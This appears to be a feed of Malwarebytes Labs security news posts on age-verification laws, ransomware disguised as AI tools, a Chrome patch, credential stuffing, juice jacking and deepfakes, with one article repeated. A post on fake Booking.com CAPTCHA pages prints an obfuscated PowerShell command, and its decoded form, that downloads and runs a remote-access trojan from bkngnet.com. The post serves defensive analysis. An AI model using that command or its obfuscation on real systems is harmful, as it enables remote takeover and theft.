Malware Bytes

VPNs (Virtual Private Networks) are suddenly popular in France. Not because France has suddenly become super privacy conscious, but because Pornhub, RedTube, and YouPorn, have blocked access in France.

But why? Last year, France enacted a law mandating that pornographic sites implement stricter age-verification technology.

Since March 1, 1994, French law has prohibited exposing minors to pornographic content. To strengthen this, a 2020 law empowered the French Regulatory Authority for Audiovisual and Digital Communication (ARCOM) to issue warnings to non-compliant online services and seek judicial orders to block access if necessary.

In 2024, the French law on securing and regulating the digital environment (SREN) further enhanced ARCOM’s authority, allowing it to administratively block platforms that fail to prevent minors from accessing pornographic content.

On October 9, 2024, ARCOM adopted a technical framework, approved by the French Data Protection Agency (CNIL), outlining minimum requirements for age verification systems.

The requirements consisted of three major pillars:

• Reliability
• Third party implementation
• Mandatory on each access

Services had until January 9, 2025, to comply with a transitional period until April 9, 2025, during which credit card-based verification was temporarily accepted under specific conditions.

In response to these regulations, the major adult websites like Pornhub, YouPorn, and RedTube have now suspended access in France, citing concerns over user privacy and data security associated with the mandated age verification methods.

This is a major decision for Pornhub because France is its second biggest market behind the US. Alex Kekesi, VP of president of brand and community of Aylo Holdings (Pornhub’s owner) said that:

“French citizens deserve a government and a regulator who are serious about preventing children from accessing adult content. They also deserve laws which protect their privacy and safeguard their sensitive data.”

In the United States, 19 states have passed laws requiring pornographic sites to confirm a user’s age by checking a government-issued ID, scanning their face, or other methods. The laws have led some of the largest adult sites, including Pornhub, to block users from those states, rather than paying millions for ID-checking services.

Naturally, everywhere where people want to View Porn Normally, the use of VPNs has increased because VPNs can be used to circumvent access restrictions imposed by such regulations. While specific figures for France are not publicly available, similar scenarios in other regions provide insight into user behavior:

• Florida: Following Pornhub’s decision to block access in response to new age verification laws, VPN demand in Florida surged by an astonishing 1,150% within the first few hours.
• Texas: After the implementation of comparable laws, VPN usage increased by approximately 234.8%.

Malwarebytes Privacy VPN

Malwarebytes Privacy VPN can help adults to decide for themselves what they want to see or not. By choosing a location where no age verification block is in place, you will be able to access your coveted websites while also enjoying:

• No-log policy: Your activity is neither tracked nor stored.
• WireGuard protocol: Ensures fast and secure connections, good for streaming.
• Server coverage: Plenty of servers near you to cover countries that are not blocked.
• Strong encryption: To keep your web activity safe from prying eyes.

Artificial intelligence (AI) and small business tools are being abused as smokescreens to hit unsuspecting victims with ransomware.

In the masquerade campaigns discovered by Cisco Talos, cybercriminals hid malware behind software and install packages that mimicked the websites or names of the lead monetization service Nova Leads, the enormously popular Chat GPT, and an AI-empowered video tool called InVideo AI.

As small businesses quickly adopt AI tools—a recent survey from the US Chamber of Commerce and the strategy firm Teneo revealed that 98% of small businesses already use at least one AI-powered product and 40% use generative AI—these cybercriminal lures pose the next, big threat to sole proprietors and boutique shops.

According to the researchers at Cisco Talos, the threat is twofold.

“Unsuspecting businesses in search of AI solutions may be deceived into downloading counterfeit tools in which malware is embedded,” Talos said. “This practice poses a significant risk, as it not only compromises sensitive business data and financial assets but also undermines trust in legitimate AI market solutions.”

In the first potential online attack, Talos found that cybercriminals created a fake website that closely resembled that of the legitimate company Nova Leads. The company helps businesses with lead monetization through acquisition, conversion, and content creation. But rather than simply copying the look and feel of Nova’s website, the cybercriminals also offered a completely fake, AI-powered product called “Nova Leads AI.”

On the malicious website, users were prompted to download Nova Leads AI for ”free access” for 12 months. If users downloaded and installed the fake software, the ransomware CyberLock was instead deployed. Researchers at Talos analyzed how CyberLock moved throughout a network and retrieved the ransom note left behind by the cybercriminals. In it, the ransomware gang claimed, falsely, that their attacks were altruistic.

“We want to assure you that your payment does not go to us,” the ransomware gang said in its note. “It will instead go to support affected women and children in Palestine, Ukraine, Africa, Asia, and other regions where injustices are a daily reality.”

In the note, victims are directed to pay $50,000 in cryptocurrency. The ransomware campaign is particularly dangerous as cybercriminals managed to manipulate SEO practices to rank their malicious website near the top of relevant online searches. This method, called “SEO poisoning,” is deployed by scammers, hackers, and shady websites.

In a second potential attack, Talos found that a software installer labeled “ChatGPT 4.0 full version – Premium.exe” was actually hiding the ransomware Lucky_Gh0$t. Interestingly, the files contained within the installer also contained legitimate open-source AI tools from Microsoft, likely as an evasion technique to ward off any antivirus tools inspecting the package for malware.

Though the Lucky_Gh0$t ransom note did not include a specific dollar amount, the cybercriminals displayed a starkly different attitude from CyberLock’s alleged humanitarianism:

“We are not a politically motivated group and we do not need anything other than your money.”

In the last potential attack, Talos found a new malware that the team dubbed “Numero.” Though it is not officially a form of ransomware, Talos found that, once deployed, it effectively renders systems “completely unusable.”

Talos discovered that the malware’s internal data co-opted the product and organizations names of the service InVideo AI, an AI-powered video generation service that can be used for marketing, content, and more.

While cybercriminals have long disguised their malware under popular brands, the emergence of AI—and its popularity for small businesses—highlight the dangers that small shops face simply for trying to do business online. But there is help at hand.

How to protect your small business from ransomware

As is true with all malware infections, the best defense to a ransomware attack is to never allow an attack to occur in the first place. Take on the following steps to secure your business from this existential threat:

• Block common forms of entry. Patch known vulnerabilities in internet-facing software and disable or harden the login credentials for remote work tools like RDP ports and VPNs.
• Prevent intrusions and stop malicious encryption. Stop threats early before they can infiltrate or infect your endpoints. Use always-on cybersecurity software that can prevent exploits and malware used to deliver ransomware.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated an outbreak and stopped a first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Google has released an update for the Chrome browser to patch an actively exploited flaw.

The update brings the Stable channel to versions 137.0.7151.68/.69 for Windows and Mac and 137.0.7151.68 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click the “more menu” (three stacked dots) >  Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from the vulnerability.

The About Chrome menu while updating

This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to exploit a specially crafted HTML page (website).

Technical details

The vulnerability tracked as CVE-2025-5419 is an out-of-bounds read and write in Google Chrome’s “V8,” which is the engine that Google developed for processing JavaScript. Prior to Google Chrome version 137.0.7151.68, this vulnerability allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

V8 has been a significant source of security problems in the past.

An out-of-bounds read and write vulnerability means that the attacker can manipulate parts of the device’s memory that should be out of their reach. Such a flaw in a program allows it to read or write outside the bounds the program sets, enabling attackers to manipulate other parts of the memory allocated to more critical functions. Attackers can write code to a part of the memory where the system executes it with permissions that the program and user should not have.

Google knows that attackers currently exploit CVE-2025-5419 in the wild, but released no details yet on who exploits the flaw, how they do it in real-world attacks, or who the targets are in those attacks. However, the Google Threat Analysis Group (TAG) team, which discovered the exploit, focuses on spyware and nation-state attackers who abuse zero days for espionage purposes.

This Chrome update also patches a medium-severity, use-after-free flaw (CVE-2025-5068) in the open-source rendering engine Blink and one internally discovered vulnerability.

We don’t just report on browser vulnerabilities. Malwarebytes’ Browser Guard protects your browser against malicious websites and credit card skimmers, blocks unwanted ads, and warns you about relevant data breaches and scams.

Mobile scams are becoming increasingly sophisticated, leaving people vulnerable to cybercriminals.  

We recently reported on the ever-increasing number of scams that are created by AI-supported tools, with attackers crafting highly convincing phishing emails that target both individuals and businesses, resulting in devastating financial losses, reputational damage, and compromised personal data.  

Elaborate sextortion scams manipulate victims by using shame as a tactic to coerce them into taking action, sometimes draining their life savings.  

And the list goes on. Scammers are always finding new ways to trick their victims into giving them their hard-earned money or sensitive information. 

These tactics include urging individuals to change their address information on a non-existent delivery, promoting job opportunities that just seem too good to be true, or having a long-lost family member reach out on WhatsApp to invite you to share their newfound fortune with you.  

As scammers develop new ways of exploiting unsuspecting users, Malwarebytes is introducing Scam Guard to combat this new wave of threats.  

Scam Guard simplifies scam prevention by providing real-time feedback via an easy-to-use AI-powered chat. Just submit a screenshot, paste suspicious content, or share texts and numbers, and we’ll give you immediate personalized guidance and safety tips. 

Scam Guard is unique in that it’s backed by Malwarebytes extensive threat research knowledge base, making it both effective and efficient.  

Whether users come across a suspicious message on social media, a phishing attempt in their email, or a questionable text message, Scam Guard provides immediate, expert advice to keep them secure. 

Key features of Scam Guard

• AI-powered chat companion: An intuitive, mobile-first advisor available 24/7 that provides guidance to users on suspicious content or activities. 

• Comprehensive scam detection: Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall, and shipping fraud, helping you stay ahead of cybercriminals at all times.  

• Constantly evolving: Scam Guard learns from users who submit new or unknown scams, which in turn helps protect the broader community.  

• 24/7 support: Scam Guard is available around the clock, ensuring that users receive timely advice and assistance, no matter where they are or what time it is. 

• Holistic mobile security: Embedded within the Malwarebytes Mobile Security app, Scam Guard works alongside our all-in-one advanced protection for iOS and Android. 

Reporting suspicious content has never been easier—simply tap to submit right in the app.  

Scam Guard is available for both free and paid users of Malwarebytes Mobile Security (iOS and Android), without having to install an additional app.  

Try it out for yourself: Download Malwarebytes Mobile Security for iOS or Android.  

For the fourth time in its history, The North Face has notified customers that their account may have been compromised. This time, the company laid blame on a credential stuffing attack.

The North Face is best known for its line of outdoor clothing, footwear, and related equipment. With an annual revenue of over $3 billion, companies like The North Face are on the radar of cybercriminals.

The notice from The North Face says:

“On April 23, 2025, we discovered unusual activity involving our website, thenorthface.com (“Website”), which we investigated immediately. Following a careful and prompt investigation, we concluded that an attacker had launched a small-scale credential stuffing attack against our Website on April 23, 2025.”

Credential stuffing is the automated injection of stolen username and password pairs in to website login forms, in order to fraudulently gain access to user accounts. Many users reuse the same password and username/email, so if those credentials are stolen from one site, for example in a data breach or phishing attack, attackers can use the same credentials to compromise accounts on other services.

With these credentials, the attackers may have found additional information like:

• Purchases made on the website
• Shipping address(es)
• Preferences
• Email address(es)
• First and last name
• Date of birth (if the user saved it to their account)
• Telephone number (if the user saved it to their account)

The North Face also said that no payment card data was compromised, as the company does not keep a copy of that information on the website. But the kind of data that was compromised still enriches a cybercriminal’s data set and helps them in performing more targeted and effective attacks.

The North Face also said:

“Please know that protecting your personal information is something that we take very seriously.”

One would think that after four credential stuffing attacks, The North Face would at least introduce the option to use multi-factor-authentication (MFA) on their website, but there’s no sign of that, let alone the enforcement of MFA. Maybe that’s because the credential stuffing attacks were dwarfed by the December 2023 ransomware attack that was later confirmed to have impacted 35 million customers.

Instead, The North Face stated that it quickly disabled passwords to halt the attack, and all users will need to create a new and unique password on the website if they have not already done so.

The emphasis on unique was done by me, because credential stuffing attacks are only successful because we have so many passwords that it’s no wonder we re-use them. Alternatively, people can look at password managers which can create and memorize complex passwords for you. But to me, it proves once again that it’s time to leave the era of passwords behind us.

The North Face is joining a long line of high-end targets that were recently attacked, including Adidas, Dior, Tiffany, Cartier, Victoria’s Secret, and Marks & Spencer.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
• Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
• Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
• Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your exposure

The Identity Theft Resource Center’s regularly published statistics show that it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan, and we’ll give you a report.

SCAN NOW

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Remember juice jacking? It’s a term that crops up every couple of years to worry travelers. This spring has seen another spate of stories, including a new, more sophisticated form of attack. But how much of a threat is it, really?

Juice jacking is where an attacker uses a malicious public USB charger to install malware on, or steal information from, your phone. In theory, the victim plugs their phone into a USB charging port like those found in airports, restaurants or public transportation to top up their battery. The attacker has programmed the charger to start a data connection with the phone, allowing them to perhaps view files or control apps.

Both Apple and Android operating system developer Google coded rudimentary protections against juice jacking into their operating systems years ago. They updated their software so that users would have to approve any request to control the phone via a USB port.

However, as Ars Technica reported last week, researchers have found a way past these mechanisms in a new variation on the theme called ChoiceJacking.

Ars offers a detailed technical analysis of the exploit, invented by researchers at Austria’s Graz University of Technology. In short, though, it gives itself permission to control the phone by spoofing the user’s button-pressing for them.

Government agencies continue to warn about the risks of juice jacking. The TSA was the most recent, posting a warning about the issue on Facebook back in March:

“Hackers can install malware at USB ports (we’ve been told that’s called ‘juice/port jacking’). So, when you’re at an airport do not plug your phone directly into a USB port. Bring your TSA-compliant power brick or battery pack and plug in there.”

The TSA is well-intentioned, but behind the times. The FBI’s Denver office tweeted about this threat back in 2023, and the LA County District Attorney’s office posted about it in 2019.

Researchers have highlighted the threat since at least 2011, when the Defcon conference installed public charging stations that would flash a warning message on peoples’ phones. Since then, others have presented on the possible risks, and enterprising tinkerers have released malicious cables that take control of devices when plugged into them.

Have any juicers actually been jacked?

The FCC, which has had an advice page about this issue since 2019, said two years ago that it hadn’t found any real-world attacks, and Malwarebytes hasn’t found any since.

However, the lack of publicly documented attacks doesn’t mean that juice jacking isn’t a risk. It’s theoretically feasible. So how can you prevent against it?

Both Apple and Google have updated their operating systems to require more robust authentication than simply pressing a button when a connected USB device asks to take over your phone. However, not all iPhone users will necessarily update their devices. Android-based smartphone vendors get to implement their own versions of the operating system on their own schedule, and many take a long time to roll out new protections if they do so at all.

One way to be sure that your phone won’t get hijacked by a malicious charging station is to use a USB cable that has the data communication pins disconnected, meaning that a malicious charging port can’t talk to your phone. However, the Ars article warns that this might also interfere with the charging process on some phones.

One alternative is to power down your phone before plugging it in. Or take your own portable charging battery with you and skip the ports altogether.

Oh, and don’t use public Wi-Fi, says TSA

On another note, the TSA Facebook post also offered another piece of advice: “Don’t use free public WiFi, especially if you’re planning to make any online purchases,” it warned. “Do not ever enter any sensitive info while using unsecure WiFi [sic].”

This advice has merit. Attackers can snoop on public Wi-Fi connections, although the advancement of HTTPS on websites mean this is less of a risk nowadays for everyday browsing. However, if you’re doing anything of a sensitive nature, such as online banking, you can use a VPN to encrypt your traffic.

A simple alternative is to simply use cellular data instead, tethering your phone if you’re using a tablet or PC.

Which of these anti-juice-hacking and Wi-Fi snooping protections should you choose? As with all cybersecurity decisions, this is a question of how much risk you’re prepared to tolerate. Personally, I err on the side of caution. A little inconvenience now could save you significant trouble later.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha prompt

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device

If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users

The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning

“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase   at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs

The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter[.]com

(booking.)badgustrewivers.com[.]com

(booking.)property-paids[.]com

(booking.)rewiewqproperty[.]com

(booking.)extranet-listing[.]com

(booking.)guestsalerts[.]com

(booking.)gustescharge[.]com

kvhandelregis[.]com

patheer-moreinfo[.]com

guestalerthelp[.]com

rewiewwselect[.]com

hekpaharma[.]com

bkngnet[.]com

partnervrft[.]com

Malwarebytes blocks the download from bkngnet[.]com How to stay safe

There are a few things you can do to protect yourself from falling victim to these and similar methods:

• Do not follow instructions provided by a website you visited without thinking it through.
• Use an active anti-malware solution that blocks malicious websites and scripts.
• Use a browser extension that blocks malicious domains and scams.
• Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Last week on Malwarebytes Labs:

• Porn sites probed for allegedly failing to prevent minors from accessing content
• Take back control of your browser—Malwarebytes Browser Guard now blocks search hijacking attempts
• Deepfake-posting man faces huge $450,000 fine
• Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
• New warning issued over toll fee scams
• 184 million logins for Instagram, Roblox, Facebook, Snapchat, and more exposed online

Last week on ThreatDown:

• KMSpico explained: No, KMS is not “kill Microsoft”
• When you shouldn’t trust a trusted root certificate

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

This week on the Lock and Code podcast…

There’s an easy way to find out what Facebook knows about you—you just have to ask.

In 2020, the social media giant launched an online portal that allows all users to access their historical data and to request specific types of information for download across custom time frames. Want to know how many posts you’ve made, ever? You can find that. What about every photo you’ve uploaded? You can find that, too. Or what about every video you’ve watched, every “recognized” device you’ve used to log in, every major settings change you made, every time someone tagged you to wish you “Happy birthday,” and every Friend Request you ever received, sent, accepted, or ignored? Yes, all that information is available for you to find, as well.

But knowing what Facebook knows about you from Facebook is, if anything, a little stale. You made your own account, you know who your Facebook friends (mostly) are, and you were in control of the keyboard when you sent those comments.

What’s far more interesting is learning what Facebook knows about you from everywhere else on the web and in the real world.

While it may sound preposterous, Facebook actually collects a great deal of information about you even when you’re not using Facebook, and even if you don’t have the app downloaded on your smartphone. As Geoffrey Fowler, reporter for The Washington Post, wrote when he first started digging into his own data:

“Even with Facebook closed on my phone, the social network gets notified when I use the Peet’s Coffee app. It knows when I read the website of presidential candidate Pete Buttigieg or view articles from The Atlantic. Facebook knows when I click on my Home Depot shopping cart and when I open the Ring app to answer my video doorbell. It uses all this information from my not-on-Facebook, real-world life to shape the messages I see from businesses and politicians alike.”

Today, on the Lock and Code podcast, host David Ruiz takes a look at his own Facebook data to understand what the social media company has been collecting about him from other companies. In his investigation, he sees that his Washington Post article views, the cars added to his online “wishlist,” and his purchases from PlayStation, APC, Freda Salvador, and the paint company Backdrop have all trickled their way into Facebook’s database.

Tune in today to listen to the full episode.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Four porn sites are being investigated by the European Commission under its Digital Services Act (DSA) for allegedly failing to verify its users’ ages properly.

The Commission, which drafts and enforces the European Union’s laws, is focusing the lens on Pornhub, Stripchat, XNXX, and XVideos with the investigation. It launched the inquiry after sending requests for information to Pornhub, Stripchat and XVideos last June over how they were protecting minors.

The DSA, which came into force in November 2022, takes a strong position on who should be allowed to view adult material online. The Act singles out very large online platforms (VLOPs), which are online sites that have over 45 million users.

Article 28 of the Act directs these platforms to:

“…appropriate and proportionate measures to ensure a high level of privacy, safety, and security of minors, on their service.”

And article 35 mandates that VLOPs take:

“…targeted measures to protect the rights of the child, including age verification and parental control tools, tools aimed at helping minors signal abuse or obtain support, as appropriate”.

The investigation follows the Commission’s publication of draft guidelines for the protection of minors online for all VLOPs (not just adult ones) earlier this month. These guidelines included implementing age verification measures. The Commission is inviting public feedback on that consultation by June 10.

Age verification in the US

This isn’t the first time that large adult sites have had to deal with this issue. Multiple US states have passed legislation requiring age verification for the sites, prompting Pornhub to block access to its services there. Pornhub chose to do that rather than comply with the age verification process because, it said, it didn’t want to invade peoples’ privacy:

“There are multiple ways that a user can prove their age, but any effective method requires them to submit some form of personally identifiable information (“PII”), like a driver’s license. By assigning this responsibility to the platform(s) visited by a user, this means submitting private information many times to adult sites all over the internet, while normalizing disclosure of PII across the internet. This is not a privacy-by-design approach.”

Pornhub also argued that its traffic dropped by 80% when it did try imposing age checks, and suggested that if asked for age verification, users will simply get adult material from other sources including piracy sites.

Verifying age safely

The Commission is planning to release a Digital Identity Wallet for identification purposes by the end of next year. In the meantime, it has promised an age verification app based on the same technology as the wallet by this summer. That app will enable people to verify their age without giving away any other personal information, it says.

Categorization as a VLOP under the DSA carries substantial risks. Those that don’t comply with the DSA face fines totaling up to 6% of their annual global revenue, and could even be banned from operating in the EU. In March 2024, Pornhub, XVideos and Stripchat sued the EU over their designations. Pornhub argued that the Commission miscalculated its user numbers, and contested a requirement to build a publicly accessible repository of advertisements running on the platform.

When announcing the investigation, the EU said month that that it is removing Stripchat as a VLOP because it doesn’t have enough EU users to qualify. That means it won’t have to comply with those requirements after September.

However, that doesn’t mean that Stripchat, or other smaller adult sites, are off the hook. The EBDS also announced an initiative to coordinate monitoring and control of these platforms among national regulators, it said. That includes sharing information about monitoring and enforcing age verification measures on those sites.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Search hijacking, often referred to as browser hijacking, occurs when cybercriminals modify users’ browser settings without their consent. This often results in users being redirected to potentially malicious websites, such as fake customer service offerings.  

Search hijacking commonly happens through free downloads, bundled software, or fake browser extensions that pose as helpful tools.  

These attacks can be very stealthy and often go unnoticed until the victim sees unexpected changes in their browsing activity. 

Hijacking attacks may involve adding fraudulent toolbars, redirecting users to websites that steal personal information, or installing ransomware on victims’ devices, forcing them to pay a ransom to regain access.  

Malwarebytes Browser Guard already protects your browser by blocking malicious websites, credit card skimmers, and trackers. Now, it will actively monitor your search results for unauthorized modifications and alert you to potential scams, providing an essential layer of additional protection.  

Add Malwarebytes Browser Guard to your favorite browser for free. Try it now 

GET BROWSER GUARD

 

A man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site. That’s if Australia’s online safety regulator gets its way.

Anthony Rotondo faces charges of posting these and other explicit deepfake images to the MrDeepfakes website, which closed down earlier this month.

According to a court order approving an arrest warrant for him in October 2023, the 55 year-old posted pictures of the Australian public figures online but when the country’s eSafety Commissioner—which regulates online safety—asked him to take them down in May 2023, he responded:

“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right.”

Rotondo, who lived in the Philippines, traveled to Australia on October 10, 2023, apparently to attend a car race on the Gold Coast. On October 20, the Office of the ESafety Commissioner got an injunction against him in Australian Federal Court, asking him to take down the images. Instead, he sent another deepfake image to media outlets and to the eSafety Commissioner’s office. The police arrested him at an apartment in Brisbane, Queensland, a few days later.

Once in custody, Rotondo gave police his access credentials to the website, enabling them to take the images down. However, a federal judge fined him $25,000 for contempt of court. He was also charged with six counts of obscene publication, one of which involved a minor. The court added another charge of endangering property by fire.

The eSafety Commissioner is now pushing for a fine of $450,000 over the obscenity charges.

What is a deepfake?

A deepfake is an image of a person produced using AI. Today it’s most commonly used to project an existing person’s likeness onto someone else’s image or video. Some include just photos, while others consist of video and audio. Audio-only deepfakes are also used to impersonate others’ voices.

Deepfake technology can be used for good, such as rekindling someone’s voice after they lose the ability to speak. There have also been some imaginative uses, such as the representation of a murder victim as a deepfake who gave an impact statement in court. Some have explored using the technology to animate the images of deceased loved ones.

However, many uses of deepfakes are less savory. Scammers use deepfake videos of popular public figures to lure victims into fraudulent investments, and deepfake voice recordings to fool family members into thinking their loved one has been involved in an accident or arrested. Deepfake porn, in which a victim’s likeness is projected onto explicit images or video, is now a scourge, and deepfake child sex abuse material is also on the rise.

As Australian eSafety Commissioner Julie Inman Grant said in a testimony to the country’s senate last July:

“The harms caused by image-based abuse have been consistently reported. They include negative impacts on mental health and career prospects, as well as social withdrawal and interpersonal difficulties.”

She continued:

“Victim-survivors have also described how their experiences of image-based abuse radically disrupted their lives, altering their sense of self, identity and their relationships with their bodies and with others.”

The following month, politicians passed an amendment to the country’s Criminal Code that introduced new penalties for sharing such content.

However, politicians have also been a hindrance. The Liberal National Party in Queensland posted a nonsexual deepfake of the state’s premier, Steven Miles, in a negative political campaign.

MrDeepfakes was the largest deepfake site in the world. It hosted at least 43,000 deepfake pictures of 3,800 people, most of whom were female musicians or actors. The site’s creators took it down early this month, citing data loss, and stating that they would not be resurrecting it.

How to protect yourself

The National Cybersecurity Alliance offers advice on protecting yourself against deepfakes, and the Cyber Civil Rights Initiative offers resources for those who have been targeted.

If you’re in the UK, the Revenge Porn helpline helps support those targeted by image abuse.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site. That’s if Australia’s online safety regulator gets its way.

Anthony Rotondo faces charges of posting these and other explicit deepfake images to the MrDeepfakes website, which closed down earlier this month.

According to a court order approving an arrest warrant for him in October 2023, the 55 year-old posted pictures of the Australian public figures online but when the country’s eSafety Commissioner—which regulates online safety—asked him to take them down in May 2023, he responded:

“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right.”

Rotondo, who lived in the Philippines, traveled to Australia on October 10, 2023, apparently to attend a car race on the Gold Coast. On October 20, the Office of the ESafety Commissioner got an injunction against him in Australian Federal Court, asking him to take down the images. Instead, he sent another deepfake image to media outlets and to the eSafety Commissioner’s office. The police arrested him at an apartment in Brisbane, Queensland, a few days later.

Once in custody, Rotondo gave police his access credentials to the website, enabling them to take the images down. However, a federal judge fined him $25,000 for contempt of court. He was also charged with six counts of obscene publication, one of which involved a minor. The court added another charge of endangering property by fire.

The eSafety Commissioner is now pushing for a fine of $450,000 over the obscenity charges.

What is a deepfake?

A deepfake is an image of a person produced using AI. Today it’s most commonly used to project an existing person’s likeness onto someone else’s image or video. Some include just photos, while others consist of video and audio. Audio-only deepfakes are also used to impersonate others’ voices.

Deepfake technology can be used for good, such as rekindling someone’s voice after they lose the ability to speak. There have also been some imaginative uses, such as the representation of a murder victim as a deepfake who gave an impact statement in court. Some have explored using the technology to animate the images of deceased loved ones.

However, many uses of deepfakes are less savory. Scammers use deepfake videos of popular public figures to lure victims into fraudulent investments, and deepfake voice recordings to fool family members into thinking their loved one has been involved in an accident or arrested. Deepfake porn, in which a victim’s likeness is projected onto explicit images or video, is now a scourge, and deepfake child sex abuse material is also on the rise.

As Australian eSafety Commissioner Julie Inman Grant said in a testimony to the country’s senate last July:

“The harms caused by image-based abuse have been consistently reported. They include negative impacts on mental health and career prospects, as well as social withdrawal and interpersonal difficulties.”

She continued:

“Victim-survivors have also described how their experiences of image-based abuse radically disrupted their lives, altering their sense of self, identity and their relationships with their bodies and with others.”

The following month, politicians passed an amendment to the country’s Criminal Code that introduced new penalties for sharing such content.

However, politicians have also been a hindrance. The Liberal National Party in Queensland posted a nonsexual deepfake of the state’s premier, Steven Miles, in a negative political campaign.

MrDeepfakes was the largest deepfake site in the world. It hosted at least 43,000 deepfake pictures of 3,800 people, most of whom were female musicians or actors. The site’s creators took it down early this month, citing data loss, and stating that they would not be resurrecting it.

How to protect yourself

The National Cybersecurity Alliance offers advice on protecting yourself against deepfakes, and the Cyber Civil Rights Initiative offers resources for those who have been targeted.

If you’re in the UK, the Revenge Porn helpline helps support those targeted by image abuse.

We don’t just report on threats—we remove them

